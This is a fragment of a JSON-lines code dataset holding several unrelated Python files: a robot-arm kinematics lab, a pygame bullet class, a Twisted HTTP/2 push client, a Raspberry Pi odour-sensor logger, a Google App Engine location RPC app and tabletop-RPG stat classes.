print(E.score)\n\nif __name__ == \"__main__\":\n env = Env()\n RL = NoisyQ(actions=list(range(env.n_actions)))\n update()\n \n ","sub_path":"Reinforcement_Learning/MaximalCalculator/6_NoisyDenseDQN/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"341445873","text":"import numpy as np\n# import scipy as sp\n# from scipy import linalg\nimport math\nimport rospy\nfrom sensor_msgs.msg import JointState\n\nnp.set_printoptions(precision=4,suppress=True)\n\n#------------------------------------------------------- Prelab Functions ------\ndef skew_3d(omega):\n \"\"\"\n Converts a rotation vector in 3D to its corresponding skew-symmetric matrix.\n \n Args:\n omega - (3,) ndarray: the rotation vector\n \n Returns:\n omega_hat - (3,3) ndarray: the corresponding skew symmetric matrix\n \"\"\"\n if not omega.shape == (3,):\n raise TypeError('omega must be a 3-vector')\n \n #YOUR CODE HERE\n omega_hat = np.array([ [ 0,-omega[2], omega[1] ],\n [ omega[2], 0, -omega[0] ],\n [-omega[1], omega[0], 0 ]])\n\n return omega_hat\n\ndef rotation_2d(theta):\n \"\"\"\n Computes a 2D rotation matrix given the angle of rotation.\n \n Args:\n theta: the angle of rotation\n \n Returns:\n rot - (3,3) ndarray: the resulting rotation matrix\n \"\"\"\n \n #YOUR CODE HERE\n rot = np.array([[math.cos(theta), -math.sin(theta)],\n [math.sin(theta), math.cos(theta)]])\n\n return rot\n\ndef rotation_3d(omega, theta):\n \"\"\"\n Computes a 3D rotation matrix given a rotation axis and angle of rotation.\n \n Args:\n omega - (3,) ndarray: the axis of rotation\n theta: the angle of rotation\n \n Returns:\n rot - (3,3) ndarray: the resulting rotation matrix\n \"\"\"\n if not omega.shape == (3,):\n raise TypeError('omega must be a 3-vector')\n \n #YOUR CODE HERE\n w_hat = skew_3d(omega)\n w_mag = np.linalg.norm(omega)\n \n rot = np.eye(3) + w_hat/w_mag*math.sin(w_mag*theta) +\\\n np.dot(w_hat,w_hat)/np.dot(w_mag,w_mag)*(1-math.cos(w_mag*theta))\n\n return rot\n\ndef hat_2d(xi):\n \"\"\"\n Converts a 2D twist to its corresponding 3x3 matrix representation\n \n Args:\n xi - (3,) ndarray: the 2D twist\n \n Returns:\n xi_hat - (3,3) ndarray: the resulting 3x3 matrix\n \"\"\"\n if not xi.shape == (3,):\n raise TypeError('omega must be a 3-vector')\n\n #YOUR CODE HERE\n xi_hat = np.array([[0 , -xi[2], xi[0]],\n [xi[2], 0, xi[1]],\n [0 , 0, 0]])\n\n \n return xi_hat\n\ndef hat_3d(xi):\n \"\"\"\n Converts a 3D twist to its corresponding 4x4 matrix representation\n \n Args:\n xi - (6,) ndarray: the 3D twist\n \n Returns:\n xi_hat - (4,4) ndarray: the corresponding 4x4 matrix\n \"\"\"\n if not xi.shape == (6,):\n raise TypeError('xi must be a 6-vector')\n\n #YOUR CODE HERE\n xi_hat = np.array([[ 0, -xi[5], xi[4], xi[0]],\n [ xi[5], 0, -xi[3], xi[1]],\n [-xi[4], xi[3], 0, xi[2]],\n [ 0, 0, 0, 0 ]])\n\n return xi_hat\n\ndef homog_2d(xi, theta):\n \"\"\"\n Computes a 3x3 homogeneous transformation matrix given a 2D twist and a \n joint displacement\n \n Args:\n xi - (3,) ndarray: the 2D twist\n theta: the joint displacement\n \n Returns:\n g - (3,3) ndarray: the resulting homogeneous transformation matrix\n \"\"\"\n if not xi.shape == (3,):\n raise TypeError('xi must be a 3-vector')\n\n #YOUR CODE HERE\n w_theta = xi[2]*theta\n R = rotation_2d(w_theta)\n p1 = np.array([[(1-math.cos(w_theta)), math.sin(w_theta)],\n [ -math.sin(w_theta), (1-math.cos(w_theta))]])\n p2 = np.array([[0,-1],\n [1, 0]])\n p3 = np.array([[xi[0]/xi[2]],\n [xi[1]/xi[2]]])\n p = np.dot(np.dot(p1,p2),p3)\n g = np.vstack((np.hstack((R ,p)),[0,0,1]))\n return g\n\n\ndef homog_3d(xi, theta):\n \"\"\"\n Computes a 4x4 homogeneous transformation matrix given a 3D twist and a \n joint displacement.\n \n Args:\n xi - (6,) ndarray: the 3D twist\n theta: the joint displacement\n\n Returns:\n g - (4,4) ndarary: the resulting homogeneous transformation matrix\n \"\"\"\n if not xi.shape == (6,):\n raise TypeError('xi must be a 6-vector')\n\n #YOUR CODE HERE\n omega = xi[3:]\n v = xi[:3]\n g1 = rotation_3d(omega, theta)\n w_mag = np.linalg.norm(omega)\n w_hat = skew_3d(omega)\n g2 = (1/(w_mag**2))*\\\n (np.dot((np.eye(3)-g1),(np.dot(w_hat,v.reshape(3,1))))+ \\\n np.dot(np.dot(omega.reshape(3,1),omega.reshape(3,1).T ),v.reshape(3,1))*theta)\n g3 = g2.reshape(3,1)\n g = np.vstack((np.hstack((g1, g3)),[0,0,0,1]))\n \n return g\n\ndef prod_exp(xi, theta):\n \"\"\"\n Computes the product of exponentials for a kinematic chain, given \n the twists and displacements for each joint.\n \n Args:\n xi - (6,N) ndarray: the twists for each joint\n theta - (N,) ndarray: the displacement of each joint\n \n Returns:\n g - (4,4) ndarray: the resulting homogeneous transformation matrix\n \"\"\"\n if not xi.shape[0] == 6:\n raise TypeError('xi must be a 6xN')\n\n #YOUR CODE HERE\n g = 1\n n = len(theta)\n for i in range(0,n):\n g = np.dot(g,homog_3d(xi[:,i], theta[i]))\n\n\n return g\n\n#--------------------------------------------------------- Task 1 ---------\ndef velocity(omega, q):\n \"\"\"\n Computes the velocity vector for a joint when given omega and q\n\n Args:\n omega - (3, 1) ndarray: vector for axis of rotation\n q - (3, 1) ndarray: vector for displacement in wider coordinate frame\n\n Returns:\n v - (3, 1) ndarray: the velocity vector\n \"\"\"\n\n v = np.cross(-omega, q)\n\n return v\n\n\ndef Twist(v, omega):\n \"\"\"\n Computes a twist with angle omega and velocity v\n\n Args:\n v - (3, 1) ndarray: vector for velocity\n omega - (3, 1) ndarray: vector for axis of rotation\n\n Returns:\n xi - (6, 1) ndarray: twist vector\n \"\"\"\n \n\n xi = np.hstack( (v , omega))\n \n return xi\n\n\n\ndef task1(theta):\n \"\"\"\n Computes the transformation matrix for baxter's arm given the joint angles\n for each joint\n\n Args:\n theta - (7, 1) ndarray: the displacement of each joint\n\n Returns:\n g - (4,4) ndarray: the resulting homogenous transformation matrix\n \"\"\"\n\n if not theta.shape == (7,):\n raise TypeError('theta must be 7x1')\n\n omega = np.array([ [-.0059,.0113,.9999],\n [-0.7077,0.7065,-0.0122],\n [.7065,.7077,-.0038],\n [-.7077,.7065,-.0122],\n [.7065,.7077,-.0038],\n [-.7077,.7065,-.0122],\n [.7065,.7077,-.0038], \n ])\n\n q = np.array([ [.0635,.2598,.1188],\n [0.1106, 0.3116,0.3885] ,\n [.1827,.3838,.3881],\n [.3682,.5684,.3181],\n [.4417,.6420,.3177],\n [.6332,.8337,.3067],\n [.7152,.9158,.3063],\n ])\n q_end = np.array([0.7957 , 0.9965, 0.3058])\n # xi = np.zeros(6, 7)\n # for i in range(0, len(theta)):\n # v = velocity(omega[i,:], q[i, :])\n # xi[:, i] = Twist(v, omega[i,:]).T\n\n xi = Twist(velocity(omega, q), omega).T\n g_initial = np.vstack((np.hstack((np.eye(3), q_end.reshape(3,1))),[0 ,0,0, 1]))\n\n g = np.dot(prod_exp(xi, theta),g_initial)\n\n return g\n\n\n#-------------------------------------------------- Task 2 -------------------\ndef callback(message):\n \"\"\"\n Plugs the joint angles into our simulator and prints\n \"\"\"\n\n position = message.position\n theta = np.array(np.hstack([position[4:6], position[2:4], position[6:9]]))\n g = task1(theta)\n print(g)\n\n\ndef listener():\n \"\"\"\n Creates a listener node that subscribes to the positions topic\n and plugs them into our joint simulator\n \"\"\"\n\n #Run this program as a new node in the ROS computation graph\n #called /listener_, where is a randomly generated numeric\n #string. This randomly generated name means we can start multiple\n #copies of this node without having multiple nodes with the same\n #name, which ROS doesn't allow.\n rospy.init_node('listener', anonymous=True)\n\n #Create a new instance of the rospy.Subscriber object which we can \n #use to receive messages of type std_msgs/String from the topic /chatter_talk.\n #Whenever a new message is received, the method callback() will be called\n #with the received message as its first argument.\n rospy.Subscriber(\"robot/joint_states\", JointState, callback)\n\n\n #Wait for messages to arrive on the subscribed topics, and exit the node\n #when it is killed with Ctrl+C\n rospy.spin()\n\n\n\n\n\n\n\n\n\n","sub_path":"lab6/src/lab6/src/kin_func_skeleton.py","file_name":"kin_func_skeleton.py","file_ext":"py","file_size_in_byte":8556,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"265167870","text":"import pygame\nfrom pygame.sprite import Sprite\n\nclass Bullet(Sprite):\n \"\"\"class of bullet shoot by ship\"\"\"\n def __init__(self, ai_settings, screen, ship):\n \"\"\"create a bullet object on the ship position\"\"\"\n super().__init__()\n self.screen = screen\n\n # reate a bullet and set the right position\n self.rect = pygame.Rect(0,0,ai_settings.bullet_width,ai_settings.bullet_height)\n self.rect.centerx = ship.rect.centerx\n self.rect.top = ship.rect.top\n\n # store the position by float\n self.y = float(self.rect.y)\n\n self.color = ai_settings.bullet_color\n self.speed_factor = ai_settings.bullet_speed_factor\n\n def update(self):\n \"\"\"up the bullet\"\"\"\n #update the number storing the position\n self.y -= self.speed_factor\n # updete the position of bullet\n self.rect.y = self.y\n\n def draw_bullet(self):\n \"\"\"draw the bullet\"\"\"\n pygame.draw.rect(self.screen,self.color, self.rect)\n","sub_path":"bullet.py","file_name":"bullet.py","file_ext":"py","file_size_in_byte":1004,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"594787465","text":"\n\n#calss header\nclass _INSENSATE():\n\tdef __init__(self,): \n\t\tself.name = \"INSENSATE\"\n\t\tself.definitions = [u'not aware of what you are doing or what is happening around you: ', u\"not feeling any sympathy for other people's suffering: \", u'having none of the characteristics of life that an animal or plant has: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_insensate.py","file_name":"_insensate.py","file_ext":"py","file_size_in_byte":566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"455029805","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\n第五章\r\n\"\"\"\r\n\r\n#%% 测试题 1\r\n# 1:字符串\r\n# 2:input('这是一条提示信息:')\r\n# 3:使用int强制转换\r\n# 4:使用float强制转换\r\n\r\n\r\n#%% 动手试一试 1\r\na='li'\r\nb='ji'\r\nprint(a+b)\r\n\r\n\r\n#%% 2\r\na=input('姓:')\r\nb=input('名:')\r\nprint(a+b)\r\n\r\n\r\n#%% 3\r\na1=float(input('长(米):'))\r\nb1=float(input('宽(米):'))\r\narea=a1*b1\r\nprint(area,'平方米',end='')\r\n\r\n\r\n#%% 4\r\na1=float(input('长(米):'))\r\nb1=float(input('宽(米):'))\r\narea=a1*b1\r\narea1=area*9\r\nmoney=area*20\r\nprint('总共需要多少地毯:'+str(area)+'平方米')\r\nprint('总共需要多少地毯:'+str(area1)+'平方英尺')\r\nprint('地毯总价格:'+str(money)+'元')\r\n\r\n\r\n#%% 5\r\na2=float(input('有多少个五分币:'))\r\nb2=float(input('有多少个二分币:'))\r\nc2=float(input('有多少个一分币:'))\r\nal=a2*5+b2*2+c2\r\nprint('总面值:'+str(al))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"Hello World/Practice Problems/第5章.py","file_name":"第5章.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"115462162","text":"# -*- coding: utf-8 -*-\n\"\"\"\npost_request.py\n~~~~~~~~~~~~~~~\n\nA short example that demonstrates a client that makes POST requests to certain\nwebsites.\n\nThis example is intended to demonstrate how to handle uploading request bodies.\nIn this instance, a file will be uploaded. In order to handle arbitrary files,\nthis example also demonstrates how to obey HTTP/2 flow control rules.\n\nTakes one command-line argument: a path to a file in the filesystem to upload.\nIf none is present, uploads this file.\n\"\"\"\nfrom __future__ import print_function\nimport ntpath\n\nimport mimetypes\nimport os\nimport sys\nimport base64\nfrom urllib3.fields import RequestField\nfrom urllib3.filepost import encode_multipart_formdata\n\nfrom twisted.internet import reactor, defer\nfrom twisted.internet.endpoints import connectProtocol, SSL4ClientEndpoint\nfrom twisted.internet.protocol import Protocol\nfrom twisted.internet.ssl import optionsForClientTLS\nfrom h2 import settings\nfrom h2.connection import H2Connection\nfrom h2.events import (\n ResponseReceived, DataReceived, StreamEnded, StreamReset, WindowUpdated,\n SettingsAcknowledged,PushedStreamReceived\n)\n\n\nAUTHORITY = u'localhost2'\nPATH = '/'\n\n\nclass H2Protocol(Protocol):\n def __init__(self, file_path):\n self.conn = H2Connection()\n self.known_proto = None\n self.request_made = False\n self.request_complete = False\n self.file_path = file_path\n self.flow_control_deferred = None\n self.fileobj = None\n self.file_size = None\n\n def connectionMade(self):\n \"\"\"\n Called by Twisted when the TCP connection is established. We can start\n sending some data now: we should open with the connection preamble.\n \"\"\"\n self.conn.initiate_connection()\n self.transport.write(self.conn.data_to_send())\n\n def dataReceived(self, data):\n \"\"\"\n Called by Twisted when data is received on the connection.\n\n We need to check a few things here. Firstly, we want to validate that\n we actually negotiated HTTP/2: if we didn't, we shouldn't proceed!\n\n Then, we want to pass the data to the protocol stack and check what\n events occurred.\n \"\"\"\n if not self.known_proto:\n self.known_proto = self.transport.negotiatedProtocol\n assert self.known_proto == b'h2'\n\n events = self.conn.receive_data(data)\n print(events)\n\n for event in events:\n if isinstance(event, ResponseReceived):\n print(event)\n self.handleResponse(event.headers)\n elif isinstance(event, DataReceived):\n print(event)\n self.handleData(event.data)\n elif isinstance(event, PushedStreamReceived):\n self.handlePushedStreamReceived(event)\n elif isinstance(event, StreamEnded):\n print(event)\n self.endStream()\n elif isinstance(event, SettingsAcknowledged):\n print(event)\n self.settingsAcked(event)\n elif isinstance(event, StreamReset):\n print(event)\n reactor.stop()\n raise RuntimeError(\"Stream reset: %d\" % event.error_code)\n\n data = self.conn.data_to_send()\n self.transport.write(data)\n\n def settingsAcked(self, event):\n \"\"\"\n Called when the remote party ACKs our settings. We send a SETTINGS\n frame as part of the preamble, so if we want to be\n if data: very polite we can\n wait until the ACK for that frame comes before we start sending our\n request.\n \"\"\"\n\n if not self.request_made:\n self.sendRequest()\n\n\n def handleResponse(self, response_headers):\n \"\"\"\n Handle the response by printing the response headers.\n \"\"\"\n for name, value in response_headers:\n # print(\"%s: %s\" % (name.decode('utf-8'), value.decode('utf-8')))\n print(\"%s: %s\" % (name, value))\n\n print(\"\")\n\n def handleData(self, data):\n \"\"\"\n We handle data that's received by just printing it.\n \"\"\"\n print(data, end='')\n\n def endStream(self):\n \"\"\"\n We call this when the stream is cleanly ended by the remote peer. That\n means that the response is complete.\n\n Because this code only makes a single HTTP/2 request, once we receive\n the complete response we can safely tear the connection down and stop\n the reactor. We do that as cleanly as possible.\n \"\"\"\n self.request_complete = True\n self.conn.close_connection()\n self.transport.write(self.conn.data_to_send())\n self.transport.loseConnection()\n\n def handlePushedStreamReceived(self, event):\n # print(event.pushed_stream_id)\n # print(event.parent_stream_id)\n # print(event.headers)\n # self.conn.prioritize(1)\n self.count = 0\n if self.count == 0:\n response_headers = [\n # (':method', 'GET'),\n # (':authority', AUTHORITY),\n # (':scheme', 'https'),\n # (':path', '/data/images/99f2374e-92cd-4082-86de-2627924e364fIMG_79011165386531.jpeg'),\n # ('user-agent', 'hyper-h2/1.0.0')\n ]\n self.conn.send_headers(event.pushed_stream_id, event.headers)\n self.count += 1\n return\n\n def connectionLost(self, reason=None):\n \"\"\"\n Called by Twisted when the connection is gone. Regardless of whether\n it was clean or not, we want to stop the reactor.\n \"\"\"\n if self.fileobj is not None:\n self.fileobj = None\n\n if reactor.running:\n reactor.stop()\n\n def sendRequest(self):\n \"\"\"\n Send the GET request.\n\n \"\"\"\n\n # Now we can build a header block.\n request_headers = [\n (':method', 'GET'),\n (':authority', AUTHORITY),\n (':scheme', 'https'),\n (':path', PATH),\n ('user-agent', 'hyper-h2/1.0.0')\n ]\n\n \n self.conn.send_headers(1, request_headers)\n self.request_made = True\n\n\ntry:\n filename = sys.argv[1]\nexcept IndexError:\n filename = __file__\n\noptions = optionsForClientTLS(\n hostname=AUTHORITY,\n acceptableProtocols=[b'h2'],\n)\n\nconnectProtocol(\n SSL4ClientEndpoint(reactor, AUTHORITY, 443, options),\n H2Protocol(filename)\n)\nreactor.run()\n","sub_path":"client/receive_server_push1.py","file_name":"receive_server_push1.py","file_ext":"py","file_size_in_byte":6462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"562458776","text":"from evennia.utils.ansi import ANSIString\n\nclass StatException(Exception):\n pass\n\nclass StorytellerStat():\n base_name = 'DefaultStat'\n can_context = True\n context = None\n context_length = 80\n category = None\n game_category = None\n sub_category = None\n keywords = []\n multiple_instance = False\n roll_stat = False\n can_specialize = False\n specialties = {}\n always_have = False\n available_ranks = []\n current_ranks = []\n multiple_ranks = False\n init_ranks = [0]\n list_order = 0\n can_favor = 0\n can_supernal = 0\n is_favored = 0\n is_supernal = 0\n owner_store = None\n fill_char = '.'\n\n @property\n def full_name(self):\n if self.context:\n return '%s: %s' % (self.base_name, self.context)\n else:\n return self.base_name\n\n def __repr__(self):\n return '<%s: %s (%s)>' % (self.category, self.full_name, self.max_rank)\n\n @property\n def alt_name(self):\n return self.base_name\n\n @property\n def rank(self):\n return self.max_rank\n\n @property\n def max_rank(self):\n return max(self.ranks)\n\n @property\n def min_rank(self):\n return min(self.ranks)\n\n @property\n def ranks(self):\n return sorted(self.current_ranks)\n\n @property\n def bonus_rank(self):\n return 0\n\n @property\n def owner(self):\n if not self.owner_store:\n return None\n from storyteller.typeclasses.characters import StorytellerCharacter\n results = StorytellerCharacter.objects.filter_family(id=self.owner_store)\n if not results:\n return None\n return results[0]\n\n def sheet_format(self, viewer, length=26):\n owner = self.owner\n if not owner:\n from storyteller.typeclasses.characters import StorytellerCharacter\n colors = StorytellerCharacter.st_sheet_colors\n else:\n colors = owner.st_sheet_colors\n if self.supernal:\n favored = ANSIString('{%s+{n' % colors['supernaldot'])\n elif self.favored:\n favored = ANSIString('{%s+{n' % colors['favordot'])\n else:\n favored = ' '\n name_len = 1 + len(self.full_name)\n bonus = self.bonus_rank or 0\n if min([1,self.max_rank]) + min([0, bonus]) + name_len < length:\n if bonus > 0:\n if self.max_rank:\n rank_dots = ('*' * self.max_rank) + ('+' * bonus)\n else:\n rank_dots = 'x' + ('+' * bonus)\n elif bonus < 0:\n if self.max_rank:\n rank_dots = ('-' * max(abs(bonus),self.max_rank)) + ('*' * (min([0, self.max_rank + bonus])))\n else:\n rank_dots = ('-' * max(abs(bonus),self.max_rank)) + 'x'\n else:\n if self.max_rank:\n rank_dots = '*' * self.max_rank\n else:\n rank_dots = 'x'\n else:\n rank_dots = str(self.max_rank + bonus)\n line_dots = self.fill_char * (length - name_len - len(rank_dots))\n return favored + self.full_name + line_dots + rank_dots\n\n def __unicode__(self):\n return unicode(self.full_name)\n\n def __str__(self):\n return str(self.full_name)\n\n def __len__(self):\n return len(str(self))\n\n def __int__(self):\n return self.rank or 0\n\n def __nonzero__(self):\n return True\n\n def __init__(self, owner, start_rank=None, start_context=None):\n from storyteller.typeclasses.characters import StorytellerCharacter\n if not owner.is_typeclass(StorytellerCharacter, exact=False):\n raise StatException(\"'%s' is not a Storyteller Character.\" % owner.key)\n self.owner_store = owner.id\n if start_rank:\n clean_rank = self.val_rank(new_rank=start_rank)\n else:\n clean_rank = self.init_ranks\n self.set_rank(clean_rank)\n if start_context:\n self.set_context(start_context)\n stats = owner.st_stats_db\n if not self.multiple_instance:\n stats = [stat for stat in stats if stat.game_category == self.game_category]\n for stat in stats:\n if stat.__class__ == self.__class__:\n raise StatException(\"'%s' is unique-per-character.\")\n elif self.multiple_instance and not start_context:\n stats = [stat for stat in stats if stat.__class__ == self.__class__ and not stat.context]\n if stats:\n raise StatException(\"'%s' entries require a context beyond one entry.\")\n elif self.multiple_instance and start_context:\n stats = [stat for stat in stats if stat.__class__ == self.__class__ and stat.context]\n stats = [stat for stat in stats if stat.context.lower() == start_context.lower()]\n if stats:\n raise StatException(\"Context entries must be unique per stat.\")\n\n\n def set_context(self, new_context):\n if not self.can_context:\n raise StatException(\"'%s' cannot have a context entry.\" % self.full_name)\n if len(new_context) > self.context_length:\n raise StatException(\"'%s' cannot have a context greater than %s characters.\" % (self.full_name, self.context_length))\n banned_characters = [':', ';', '/', '\\t', '\\n', '(', ')', '[', ']', '{', '}']\n for char in banned_characters:\n if char in new_context:\n raise StatException(\"'%s' context cannot contain a colon, semicolon, forward slash, newline, indent, brackets, curly braces, or parentheses.\")\n self.context = new_context\n\n def set_rank(self, new_rank):\n clean_rank = self.val_rank(new_rank)\n if len(clean_rank) > 1 and not self.multiple_ranks:\n raise StatException(\"'%s' cannot have multiple ranks.\")\n self.current_ranks = clean_rank\n\n def add_rank(self, new_rank):\n clean_rank = self.val_rank(new_rank)\n new_ranks = sorted(list(set(clean_rank, self.current_ranks)))\n if len(new_ranks) > 1 and not self.multiple_ranks:\n raise StatException(\"'%s' cannot have multiple ranks.\")\n self.current_ranks = new_ranks\n\n def rem_rank(self, old_rank):\n for rank in old_rank:\n if rank not in self.current_ranks:\n raise StatException(\"'%s' does not have a rank of '%s' to remove.\" % (self.full_name, str(old_rank)))\n\n def val_rank(self, new_rank):\n clean_ranks = []\n for rank in list(new_rank):\n int_rank = int(rank)\n if int_rank not in self.available_ranks:\n raise StatException(\"'%s' can only have the following ranks: '%s'\" % (self.full_name, \", \".join(sorted(self.available_ranks))))\n clean_ranks.append(int_rank)\n return sorted(list(set(clean_ranks)))\n\n @property\n def favored(self):\n return self.is_favored\n\n @property\n def supernal(self):\n return self.is_supernal\n\n def set_favored(self, value):\n if not self.can_favor:\n raise StatException(\"'%s' cannot be favored.\" % self.full_name)\n value = bool(value)\n self.is_favored = value\n\n def set_supernal(self, value):\n if not self.can_supernal:\n raise StatException(\"'%s' cannot be Supernal.\" % self.full_name)\n value = bool(value)\n self.is_supernal = value\n\n\nclass AttributeStat(StorytellerStat):\n base_name = 'DefaultAttribute'\n category = 'Attribute'\n available_ranks = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n roll_stat = True\n always_have = True\n init_ranks = [1]\n can_context = False\n\nclass SkillStat(StorytellerStat):\n base_name = 'DefaultSkill'\n category = 'Skill'\n available_ranks = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n roll_stat = True\n always_have = True\n can_context = False\n\nclass MeritStat(StorytellerStat):\n base_name = 'DefaultMerit'\n category = 'Merit'\n multiple_instance = True\n\nclass PowerStat(StorytellerStat):\n base_name = 'Power'\n category = 'Advantage'\n roll_stat = True\n init_ranks = [1]\n available_ranks = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n @property\n def full_name(self):\n return self.alt_name\n\n @property\n def alt_name(self):\n if self.owner:\n return self.owner.power_stat_name\n else:\n return self.base_name\n\nclass WillpowerStat(StorytellerStat):\n base_name = 'Willpower'\n category = 'Advantage'\n roll_stat = True\n available_ranks = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]","sub_path":"storyteller/stats/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":8591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"192665966","text":"# coding: utf-8\n\nimport spidev\nimport RPi.GPIO as GPIO\nimport pygame.mixer\nimport time\n\nimport datetime\nimport sqlite3\n\ndbpath = 'logging'\nconnection = sqlite3.connect(dbpath)\nconnection.isolation_level = None\ncursor = connection.cursor()\nsql = \"CREATE TABLE IF NOT EXISTS kusai (t TIMESTAMP, v INT)\"\ncursor.execute(sql)\nconnection.commit()\nconnection.close()\n\nthreshold = 500 #閾値を変えるときはここを変更\n\npygame.mixer.init()\npygame.mixer.music.load(\"/home/pi/Desktop/kusai/kusai.mp3\") #mp3データを変えるときはここを変更\n\nGPIO.setmode(GPIO.BCM)\nGPIO.setup(17,GPIO.OUT)\nGPIO.setup(22,GPIO.OUT)\n\nspi = spidev.SpiDev()\n\nspi.open(0,0)\n\nspi.max_speed_hz=1000000\n\nspi.bits_per_word=8\n\ndummy = 0xff\nstart = 0x47\nsgl = 0x20\n\nch0 = 0x00\n\nmsbf = 0x08\n\ndef measure(ch):\n ad = spi.xfer2( [ (start + sgl + ch + msbf), dummy ] )\n val = ((ad[0] & 0x03) << 8) + ad[1]\n return val\n\ntry:\n while 1:\n time.sleep(56.88)\n\n GPIO.output(22,True)\n time.sleep(0.72)\n\n ch0_val = measure(ch0)\n Val = 1023 - ch0_val\n time.sleep(0.48)\n GPIO.output(22,False)\n \n GPIO.output(17,True)\n time.sleep(1.92)\n GPIO.output(17,False)\n\n print(Val)\n\n dbpath = 'logging'\n connection = sqlite3.connect(dbpath)\n connection.isolation_level = None\n cursor = connection.cursor()\n sql = \"insert into kusai (t,v)VALUES(datetime('now'), %s)\"%Val\n cursor.execute(sql)\n connection.commit()\n connection.close()\n\n if Val > threshold:\n pygame.mixer.music.play(0)\n\nexcept KeyboardInterrupt:\n pass\n\npygame.mixer.music.stop()\nspi.close()\n","sub_path":"kussa.py","file_name":"kussa.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"363549254","text":"# !/usr/bin/env python\n#\n# Copyright 2008 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\"\"\"Implements the server-side RPCs for the My Hangouts application.\n\nProvides a simple RPC framework for making mostly abstract Python\nfunction calls from JavaScript. Provides a few simple functions for\nthe My Hangouts application.\n\nThis application uses the lower level Datastore API to make datastore\ncalls and perform queries.\n\"\"\"\n\n__author__ = 'Kevin Gibbs'\n\nimport os\nimport logging\nimport datetime\nimport simplejson\nimport wsgiref.handlers\n\nfrom google.appengine.api import datastore\nfrom google.appengine.api import users\nfrom google.appengine.ext import webapp\nfrom google.appengine.ext.webapp import template\n\n# Renders the main template.\nclass MainPage(webapp.RequestHandler):\n def get(self):\n query = datastore.Query('User')\n current_user = users.GetCurrentUser()\n user_list = {}\n for user in query.Get(100):\n user_list[user['user'].email()] = user['user']\n if current_user:\n user_list[current_user.email()] = current_user\n display_user = self.request.get('user')\n if display_user:\n display_user = users.User(display_user + os.environ['AUTH_DOMAIN'])\n else:\n display_user = current_user\n if len(user_list) > 0 and (not display_user or\n display_user.email() not in user_list):\n display_user = user_list.values()[0]\n template_values = {\n 'users': user_list.values(),\n 'current_user': current_user,\n 'display_user': display_user,\n 'login_url': users.CreateLoginURL(self.request.uri),\n 'logout_url': users.CreateLogoutURL(self.request.uri),\n }\n path = os.path.join(os.path.dirname(__file__), \"myhangouts.html\")\n self.response.out.write(template.render(path, template_values))\n\n# This handler allows the functions defined in the RPCHandler class to\n# be called automatically by remote code.\nclass RPCHandler(webapp.RequestHandler):\n def get(self):\n action = self.request.get('action')\n arg_counter = 0;\n args = ()\n while True:\n arg = self.request.get('arg' + str(arg_counter))\n arg_counter += 1\n if arg:\n args += (simplejson.loads(arg),);\n else:\n break;\n result = getattr(self, action)(*args)\n self.response.out.write(simplejson.dumps((result)))\n\n # The RPCs exported to JavaScript follow here:\n\n def AddLocation(self, latd, longd, name):\n user = users.GetCurrentUser()\n query = datastore.Query('User')\n query['user ='] = user\n if (query.Count() == 0):\n user_entity = datastore.Entity('User')\n user_entity['user'] = user\n datastore.Put(user_entity)\n location = datastore.Entity(\"Location\")\n location['user'] = user\n location['latd'] = latd\n location['longd'] = longd\n location['name'] = name\n datastore.Put(location)\n # Add a few additional attributes so that they are available to\n # the remote user.\n location['user'] = location['user'].email()\n location['key'] = str(location.key())\n return location\n\n def RemoveLocation(self, key):\n datastore.Delete(datastore.Key(key.encode('utf-8')))\n return True\n\n def GetLocations(self, user_email=None):\n if user_email:\n user = users.User(user_email)\n else:\n user = users.GetCurrentUser()\n query = datastore.Query('Location')\n if not user:\n return []\n query['user ='] = user\n locations = []\n for location in query.Get(100):\n # Add a few additional attributes so that they are available to\n # the remote user.\n location['user'] = location['user'].email()\n location['key'] = str(location.key())\n locations += [location]\n return locations\n\ndef main():\n application = webapp.WSGIApplication([\n ('/', MainPage),\n ('/rpc', RPCHandler),\n ], debug=True)\n wsgiref.handlers.CGIHandler().run(application)\n\nif __name__ == '__main__':\n main()\n","sub_path":"python/app_gallary/myhangouts/myhangouts.py","file_name":"myhangouts.py","file_ext":"py","file_size_in_byte":4398,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"291200271","text":"from hlwtadmin.models import Artist, GigFinderUrl, GigFinder, ConcertAnnouncement, Venue, Location, Organisation, Country, Concert, RelationConcertOrganisation, Location\n\nfrom django.core.management.base import BaseCommand, CommandError\n\nfrom pandas import 